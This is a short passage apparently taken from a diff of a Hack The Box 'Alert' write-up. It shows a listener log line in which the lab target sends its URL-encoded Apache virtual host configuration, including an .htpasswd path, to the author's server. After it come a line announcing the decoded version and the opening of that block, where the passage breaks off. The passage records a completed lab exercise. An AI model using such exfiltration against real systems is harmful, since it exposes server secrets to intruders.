jensmeindertsma/malachite/content/alert/alert.md

 10.10.11.44 - - [11/Dec/2024 17:11:15] "GET /?data=%3Cpre%3E%3CVirtualHost%20*%3A80%3E%0A%20%20%20%20ServerName%20alert.htb%0A%0A%20%20%20%20DocumentRoot%20%2Fvar%2Fwww%2Falert.htb%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Falert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20RewriteEngine%20On%0A%20%20%20%20RewriteCond%20%25%7BHTTP_HOST%7D%20!%5Ealert%5C.htb%24%0A%20%20%20%20RewriteCond%20%25%7BHTTP_HOST%7D%20!%5E%24%0A%20%20%20%20RewriteRule%20%5E%2F%3F(.*)%24%20http%3A%2F%2Falert.htb%2F%241%20%5BR%3D301%2CL%5D%0A%0A%20%20%20%20ErrorLog%20%24%7BAPACHE_LOG_DIR%7D%2Ferror.log%0A%20%20%20%20CustomLog%20%24%7BAPACHE_LOG_DIR%7D%2Faccess.log%20combined%0A%3C%2FVirtualHost%3E%0A%0A%3CVirtualHost%20*%3A80%3E%0A%20%20%20%20ServerName%20statistics.alert.htb%0A%0A%20%20%20%20DocumentRoot%20%2Fvar%2Fwww%2Fstatistics.alert.htb%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Fstatistics.alert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Fstatistics.alert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20Indexes%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%20%20%20%20AuthType%20Basic%0A%20%20%20%20%20%20%20%20AuthName%20%22Restricted%20Area%22%0A%20%20%20%20%20%20%20%20AuthUserFile%20%2Fvar%2Fwww%2Fstatistics.alert.htb%2F.htpasswd%0A%20%20%20%20%20%20%20%20Require%20valid-user%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20ErrorLog%20%24%7BAPACHE_LOG_DIR%7D%2Ferror.log%0A%20%20%20%20CustomLog%20%24%7BAPACHE_LOG_DIR%7D%2Faccess.log%20combined%0A%3C%2FVirtualHost%3E%0A%0A%3C%2Fpre%3E%0A HTTP/1.1" 200 -
 ```

 What is this blob of junk you ask?
-Well:
+Well, you should ask my decoding friend:

 ```
 <VirtualHost *:80>